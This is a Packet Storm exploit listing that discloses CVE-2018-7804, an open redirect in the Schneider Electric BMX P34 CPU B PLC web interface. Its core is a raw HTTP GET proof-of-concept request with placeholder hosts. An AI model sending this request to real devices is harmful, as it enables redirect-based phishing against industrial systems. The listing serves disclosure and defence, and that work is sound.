Lucene search
Ismail TasdelenPACKETSTORM:150163HistoryNov 05, 2018 - 12:00 a.m.
Schneider Electric BMX P34 CPU B Open Redirect
2018-11-0500:00:00
Ismail Tasdelen
packetstormsecurity.com
235
0.001 Low
EPSS
Percentile
33.8%
`# Exploit Title: Schneider Electric BMX P34 CPU B - Unvalidated Redirects and Forwards
# Date: 2018-07-21
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.schneider-electric.com/
# Hardware Link : https://www.schneider-electric.com/en/product/BMXP342020/
# Software : Schneider Electric BMXP342020
# Product Version: BMX P34 CPU B
# Vulernability Type : Unvalidated Redirects and Forwards
# Vulenrability : Open Redirect
# CVE : CVE-2018-7804
# An Open Redirect security vulnerability has been discovered in the Schneider Electric BMX P34 CPU B hardware product.
HTTP GET Request :
GET /html/english/home/index.htm?http://TARGET HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: TUE JAN 01 00:00:45 1980
Cache-Control: max-age=0
`
Related
cvelist
cvelist
CVE-2018-7804
2018-12-17 22:00:00
prion
prion
Design/Logic Flaw
2018-12-17 22:29:00
nvd
nvd
CVE-2018-7804
2018-12-17 22:29:00
nessus
nessus
Schneider Electric Modicon Open Redirect (CVE-2018-7804)
2022-02-07 00:00:00
cve
cve
CVE-2018-7804
2018-12-17 22:29:00